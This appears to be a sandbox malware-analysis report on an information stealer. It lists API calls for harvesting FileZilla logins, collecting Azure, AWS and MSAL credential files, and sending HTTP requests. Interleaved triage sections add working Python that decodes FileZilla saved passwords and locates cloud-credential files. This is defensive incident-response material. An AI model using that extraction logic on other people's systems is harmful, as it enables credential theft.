                                              • memset.MSVCRT ref: 0041083D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                              • API String ID: 337689325-555421843
                                              • Opcode ID: 4fc848dbf87095acd12c42b60f0aab464385706ec0422a8f446ef3a48111bdb9
                                              • Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
                                              • Opcode Fuzzy Hash: 4fc848dbf87095acd12c42b60f0aab464385706ec0422a8f446ef3a48111bdb9
                                              • Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69
                                              APIs
                                              • lstrlen.KERNEL32(00424EC8), ref: 04844883
                                              • lstrlen.KERNEL32(00424F78), ref: 0484488E
                                              • lstrlen.KERNEL32(00425040), ref: 04844899
                                              • lstrlen.KERNEL32(004250F8), ref: 048448A4
                                              • lstrlen.KERNEL32(004251A0), ref: 048448AF
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 048448BE
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 048448C5
                                              • lstrlen.KERNEL32(00425248), ref: 048448D3
                                              • lstrlen.KERNEL32(004252F0), ref: 048448DE
                                              • lstrlen.KERNEL32(00425398), ref: 048448E9
                                              • lstrlen.KERNEL32(00425440), ref: 048448F4
                                              • lstrlen.KERNEL32(?), ref: 048448FF
                                              • lstrlen.KERNEL32(00425590), ref: 04844913
                                              • lstrlen.KERNEL32(00425638), ref: 0484491E
                                              • lstrlen.KERNEL32(004256E0), ref: 04844929
                                              • lstrlen.KERNEL32(00425788), ref: 04844934
                                              • lstrlen.KERNEL32(00425830), ref: 0484493F
                                              • lstrlen.KERNEL32(004258D8), ref: 04844968
                                              • lstrlen.KERNEL32(00425980), ref: 04844973
                                              • lstrlen.KERNEL32(00425A48), ref: 0484497E
                                              • lstrlen.KERNEL32(00425AF0), ref: 04844989
                                              • lstrlen.KERNEL32(00425B98), ref: 04844994
                                              • strlen.MSVCRT ref: 048449A7
                                              • lstrlen.KERNEL32(00425C40), ref: 048449CF
                                              • lstrlen.KERNEL32(00425CE8), ref: 048449DA
                                              • lstrlen.KERNEL32(00425D90), ref: 048449E5
                                              • lstrlen.KERNEL32(00425E38), ref: 048449F0
                                              • lstrlen.KERNEL32(00425EE0), ref: 048449FB
                                              • lstrlen.KERNEL32(00425F88), ref: 04844A0B
                                              • lstrlen.KERNEL32(00426030), ref: 04844A16
                                              • lstrlen.KERNEL32(004260D8), ref: 04844A21
                                              • lstrlen.KERNEL32(00426180), ref: 04844A2C
                                              • lstrlen.KERNEL32(00426228), ref: 04844A37
                                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 04844A53
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                              • String ID:
                                              • API String ID: 2127927946-0
                                              • Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                              • Instruction ID: 4a173e033aeaed09b1f249975f1aa841148fdae1188085e9c5ab489516118151
                                              • Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                              • Instruction Fuzzy Hash: 28410C79740624ABE7109FE5FC4DBDCBF60AB4C712BA08051F90A89190C7F993859B7D
                                              APIs
                                              • GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 04859E58
                                              • GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 04859E71
                                              • GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 04859E89
                                              • GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 04859EA1
                                              • GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 04859EBA
                                              • GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 04859ED2
                                              • GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 04859EEA
                                              • GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 04859F03
                                              • GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 04859F1B
                                              • GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 04859F33
                                              • GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 04859F4C
                                              • GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 04859F64
                                              • GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 04859F7C
                                              • GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 04859F95
                                              • GetProcAddress.KERNEL32(006D72B8,006D6F98), ref: 04859FAD
                                              • GetProcAddress.KERNEL32(006D72B8,006D6C24), ref: 04859FC5
                                              • GetProcAddress.KERNEL32(006D72B8,006D6E18), ref: 04859FDE
                                              • GetProcAddress.KERNEL32(006D72B8,006D7034), ref: 04859FF6
                                              • GetProcAddress.KERNEL32(006D72B8,006D6ABC), ref: 0485A00E
                                              • GetProcAddress.KERNEL32(006D72B8,006D6B2C), ref: 0485A027
                                              • GetProcAddress.KERNEL32(006D72B8,006D6CB0), ref: 0485A03F
                                              • LoadLibraryA.KERNEL32(006D6F50,?,04856F07), ref: 0485A051
                                              • LoadLibraryA.KERNEL32(006D6B7C,?,04856F07), ref: 0485A062
                                              • LoadLibraryA.KERNEL32(006D6B04,?,04856F07), ref: 0485A074
                                              • LoadLibraryA.KERNEL32(006D6BDC,?,04856F07), ref: 0485A086
                                              • LoadLibraryA.KERNEL32(006D6D28,?,04856F07), ref: 0485A097
                                              • GetProcAddress.KERNEL32(006D70DC,006D6EAC), ref: 0485A0B9
                                              • GetProcAddress.KERNEL32(006D71FC,006D6E24), ref: 0485A0DA
                                              • GetProcAddress.KERNEL32(006D71FC,006D6BCC), ref: 0485A0F2
                                              • GetProcAddress.KERNEL32(006D72EC,006D6D94), ref: 0485A114
                                              • GetProcAddress.KERNEL32(006D71B0,006D6B28), ref: 0485A135
                                              • GetProcAddress.KERNEL32(006D71E0,006D6E14), ref: 0485A156
                                              • GetProcAddress.KERNEL32(006D71E0,0042072C), ref: 0485A16D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad
                                              • String ID:
                                              • API String ID: 2238633743-0
                                              • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                              • Instruction ID: 9e9e4c914507bcdfbd346379072f141aeff35a1d2eda5ec41df9613f162cd914
                                              • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                              • Instruction Fuzzy Hash: 15A16DB5D1A2549FC344DFA8FC889567BBBA78D301708A61BF909C3674E734A640CF62
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 048591D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04859202
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 0484A377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0484A3A3
                                                • Part of subcall function 0484A377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0484A3C8
                                                • Part of subcall function 0484A377: LocalAlloc.KERNEL32(00000040,?), ref: 0484A3E8
                                                • Part of subcall function 0484A377: ReadFile.KERNEL32(000000FF,?,00000000,048416F6,00000000), ref: 0484A411
                                                • Part of subcall function 0484A377: LocalFree.KERNEL32(048416F6), ref: 0484A447
                                                • Part of subcall function 0484A377: CloseHandle.KERNEL32(000000FF), ref: 0484A451
                                                • Part of subcall function 04859227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 04859249
                                              • strtok_s.MSVCRT ref: 048506E2
                                              • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 04850729
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04850730
                                              • StrStrA.SHLWAPI(00000000,00421710), ref: 0485074C
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 0485075A
                                                • Part of subcall function 04858CD7: malloc.MSVCRT ref: 04858CDF
                                                • Part of subcall function 04858CD7: strncpy.MSVCRT ref: 04858CFA
                                              • StrStrA.SHLWAPI(00000000,00421718), ref: 04850796
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048507A4
                                              • StrStrA.SHLWAPI(00000000,00421720), ref: 048507E0
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048507EE
                                              • StrStrA.SHLWAPI(00000000,00421728), ref: 0485082A
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 0485083C
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048508C9
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048508E1
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048508F9
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 04850911
                                              • lstrcat.KERNEL32(?,00421744), ref: 04850929
                                              • lstrcat.KERNEL32(?,00421758), ref: 04850938
                                              • lstrcat.KERNEL32(?,00421768), ref: 04850947
                                              • lstrcat.KERNEL32(?,00000000), ref: 0485095A
                                              • lstrcat.KERNEL32(?,00421770), ref: 04850969
                                              • lstrcat.KERNEL32(?,00000000), ref: 0485097C
                                              • lstrcat.KERNEL32(?,00421774), ref: 0485098B
                                              • lstrcat.KERNEL32(?,00421778), ref: 0485099A
                                              • lstrcat.KERNEL32(?,00000000), ref: 048509AD
                                              • lstrcat.KERNEL32(?,00421780), ref: 048509BC
                                              • lstrcat.KERNEL32(?,00421784), ref: 048509CB
                                              • lstrcat.KERNEL32(?,00000000), ref: 048509DE
                                              • lstrcat.KERNEL32(?,00421790), ref: 048509ED
                                              • lstrcat.KERNEL32(?,00421794), ref: 048509FC
                                              • strtok_s.MSVCRT ref: 04850A40
                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 04850A55
                                              • memset.MSVCRT ref: 04850AA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                              • String ID:
                                              • API String ID: 3689735781-0
                                              • Opcode ID: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
                                              • Instruction ID: 570783ca4e14e43d088714e6fc1e019087b5e3383ee17e700d1a8368f21a596d
                                              • Opcode Fuzzy Hash: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
                                              • Instruction Fuzzy Hash: C6D13271D01218ABDB08FBE4DD85EEE7739AF54305F504B59E902E60A0EBB4BA48CB51
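The two listings above (the routine in the mapped image at 00400000 and its copy in the 04840000 region) show how the sample harvests FileZilla's recentservers.xml: StrStrA locates the literal <Host>, <Port>, <User> and <Pass encoding="base64"> tags, and a chain of lstrcatA calls lays the values out behind "browser: FileZilla", "profile: null", "url: ", "login: " and "password: ". The Python below is an added triage helper, not code from the sample or from Joe Sandbox; it rebuilds that record from a constructed recentservers.xml so a responder can see exactly which credentials were exposed and need rotating. Assumptions: the separator constants the report prints only as addresses (00421770, 00421774, 00421780, 00421790, 00421794) are taken to be ":" between host and port and newlines elsewhere, and the password is base64-decoded here even though this routine shows no decode call, so that the output is directly actionable.

```python
import base64
import binascii
import re
from typing import Dict, List

# Relative path the sample appends under the user profile (String ID line above).
RECENTSERVERS_RELPATH = r"\AppData\Roaming\FileZilla\recentservers.xml"

# Constructed sample file: fictitious hosts and throwaway credentials.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.5" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
    <Server>
      <Host>sftp.internal.example.test</Host>
      <Port>2222</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Pass encoding="base64">c3VwZXItc2VjcmV0</Pass>
    </Server>
  </RecentServers>
</FileZilla3>
"""

_SERVER = re.compile(r"<Server>(.*?)</Server>", re.S)
_FIELD = re.compile(r"<(Host|Port|User)>(.*?)</\1>", re.S)
# Exactly the literal the sample searches for with StrStrA.
_PASS = re.compile(r'<Pass encoding="base64">(.*?)</Pass>', re.S)


def _decode_password(b64: str) -> str:
    """Decode FileZilla's base64 password; keep the raw text if it is not valid base64."""
    try:
        return base64.b64decode(b64.strip(), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return b64


def extract_servers(xml_text: str) -> List[Dict[str, str]]:
    """One dict per <Server> with host, port, user and decoded password.

    Like the sample, this is a substring search for the four tags rather than
    an XML parse. Entries without a <Pass> element (key-file or interactive
    logins) get an empty password instead of raising.
    """
    servers = []
    for block in _SERVER.findall(xml_text):
        fields = {name.lower(): value.strip() for name, value in _FIELD.findall(block)}
        m = _PASS.search(block)
        fields["password"] = _decode_password(m.group(1)) if m else ""
        for key in ("host", "port", "user"):
            fields.setdefault(key, "")
        servers.append(fields)
    return servers


def format_record(server: Dict[str, str]) -> str:
    """Lay the fields out in the order of the lstrcatA chain in the listing.

    The literal pieces come from the report; the ":" and the newlines are the
    assumed contents of the unprinted separator constants.
    """
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {server['host']}:{server['port']}\n"
        f"login: {server['user']}\n"
        f"password: {server['password']}\n"
    )


def triage(xml_text: str) -> List[str]:
    """Records the sample would have built from this file, one per saved server."""
    return [format_record(s) for s in extract_servers(xml_text)]


if __name__ == "__main__":
    for record in triage(SAMPLE_XML):
        print(record)
```

Run it against a copy of the victim's recentservers.xml instead of SAMPLE_XML to get the list of hosts and accounts to rotate; every server in that file should be treated as compromised regardless of whether the C2 upload succeeded.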
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
                                              • StrCmpCA.SHLWAPI(?,02C9ED80), ref: 00405A63
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02CA73A8,00000000,?,02CA0838,00000000,?,00421B4C), ref: 00405EC1
                                              • lstrlenA.KERNEL32(00000000), ref: 00405ED2
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
                                              • HeapAlloc.KERNEL32(00000000), ref: 00405EEA
                                              • lstrlenA.KERNEL32(00000000), ref: 00405EFF
                                              • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
                                              • lstrlenA.KERNEL32(00000000), ref: 00405F28
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
                                              • memcpy.MSVCRT(?), ref: 00405F4E
                                              • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
                                              • InternetCloseHandle.WININET(00000000), ref: 00406000
                                              • InternetCloseHandle.WININET(00000000), ref: 0040600D
                                              • HttpOpenRequestA.WININET(00000000,02CA7328,?,02CA65B8,00000000,00000000,00400100,00000000), ref: 00405C48
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • InternetCloseHandle.WININET(00000000), ref: 00406017
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                              • String ID: "$"$------$------$------$S`A$S`A
                                              • API String ID: 1406981993-1449208648
                                              • Opcode ID: ece7f536badaabeff24f30454e587c13eb1b05989c193d290bb1a0ec0f220d4a
                                              • Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
                                              • Opcode Fuzzy Hash: ece7f536badaabeff24f30454e587c13eb1b05989c193d290bb1a0ec0f220d4a
                                              • Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59
                                              APIs
                                              • memset.MSVCRT ref: 00414FD7
                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00415000
                                              • lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D
                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                              • memset.MSVCRT ref: 00415063
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0041508C
                                              • lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9
                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                              • memset.MSVCRT ref: 004150EF
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00415118
                                              • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135
                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
                                                • Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,02C9ED50,?,000003E8), ref: 00414C9A
                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
                                                • Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
                                                • Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81
                                              • memset.MSVCRT ref: 0041517B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                              • API String ID: 4017274736-974132213
                                              • Opcode ID: 08139e44e5d7f232419ca54b84d5d6bd78c899cf797d15b4c3395f2c57b04096
                                              • Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
                                              • Opcode Fuzzy Hash: 08139e44e5d7f232419ca54b84d5d6bd78c899cf797d15b4c3395f2c57b04096
                                              • Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A
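The listing above is the cloud-credential collector: the sample resolves a base folder with SHGetFolderPathA, appends \.azure\, \.aws\ and \.IdentityService\, walks each with FindFirstFileA/FindNextFileA, filters names with PathMatchSpecA against the masks "*.*" and "msal.cache", and copies hits with CopyFileA into "Azure\..." named staging folders. The Python below is an added scoping helper, not code from the sample or from Joe Sandbox; it reports which files under those three directories the walk would have picked up, so the responder knows which Azure tokens, AWS keys and MSAL caches to revoke. Assumptions: the CSIDL passed to SHGetFolderPathA is not printed, so the base folder is taken to be the user profile; the report does not show which mask applies to which directory, so a hit on either counts; "*.*" is treated as matching every file name, as the Windows wildcard does; the walk is taken to be recursive. The fixture tree is constructed with placeholder contents.

```python
import fnmatch
import os
import tempfile
from pathlib import Path
from typing import Dict, List

# Directory names the sample appends to the resolved folder (String ID line above).
TARGET_DIRS = [".azure", ".aws", ".IdentityService"]
# Masks handed to PathMatchSpecA in the listing; which mask goes with which
# directory is not shown, so a hit on either is reported (assumption).
MASKS = ["*.*", "msal.cache"]


def _matches(name: str) -> bool:
    # "*.*" is treated as match-all, the Windows wildcard semantics (assumption
    # stated in the lead-in); fnmatch alone would demand a literal dot.
    return any(m == "*.*" or fnmatch.fnmatch(name, m) for m in MASKS)


def files_at_risk(profile_root: Path) -> Dict[str, List[str]]:
    """Map each target directory that exists under profile_root to the files the
    sample's walk would collect (paths relative to the root, POSIX separators so
    results compare the same on any OS). Directories that do not exist are
    omitted, mirroring FindFirstFileA failing on a missing path."""
    hits: Dict[str, List[str]] = {}
    for rel in TARGET_DIRS:
        base = profile_root / rel
        if not base.is_dir():
            continue
        found = []
        for root, _dirs, names in os.walk(base):
            for name in names:
                if _matches(name):
                    found.append(Path(root, name).relative_to(profile_root).as_posix())
        hits[rel] = sorted(found)
    return hits


def build_fixture() -> Path:
    """Create a throwaway profile tree like the one on a developer workstation.

    Constructed layout; file contents are placeholders, not real secrets.
    """
    root = Path(tempfile.mkdtemp(prefix="stealc-triage-"))
    layout = {
        ".azure/msal_token_cache.bin": b"placeholder",
        ".azure/azureProfile.json": b"{}",
        ".aws/credentials": b"[default]\naws_access_key_id = EXAMPLE\n",
        ".aws/config": b"[default]\nregion = eu-west-1\n",
        ".IdentityService/msal.cache": b"placeholder",
        "Documents/notes.txt": b"not targeted",
    }
    for rel, data in layout.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(data)
    return root


if __name__ == "__main__":
    # On a live host, point this at the affected user's profile directory.
    for directory, files in files_at_risk(Path.home()).items():
        print(directory)
        for f in files:
            print("  ", f)
```

Any file the helper lists should be assumed exfiltrated: revoke the AWS access keys in .aws/credentials, sign the user out of Azure CLI sessions and clear the MSAL caches so the cached refresh tokens stop working.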
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
                                              • HeapAlloc.KERNEL32(00000000), ref: 0040D1CE
                                              • lstrcatA.KERNEL32(?,00000000,02C9EE20,0042156C,02C9EE20,00421568,00000000), ref: 0040D308
                                              • lstrcatA.KERNEL32(?,00421570), ref: 0040D317
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
                                              • lstrcatA.KERNEL32(?,00421574), ref: 0040D339
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
                                              • lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
                                              • lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D390
                                              • lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
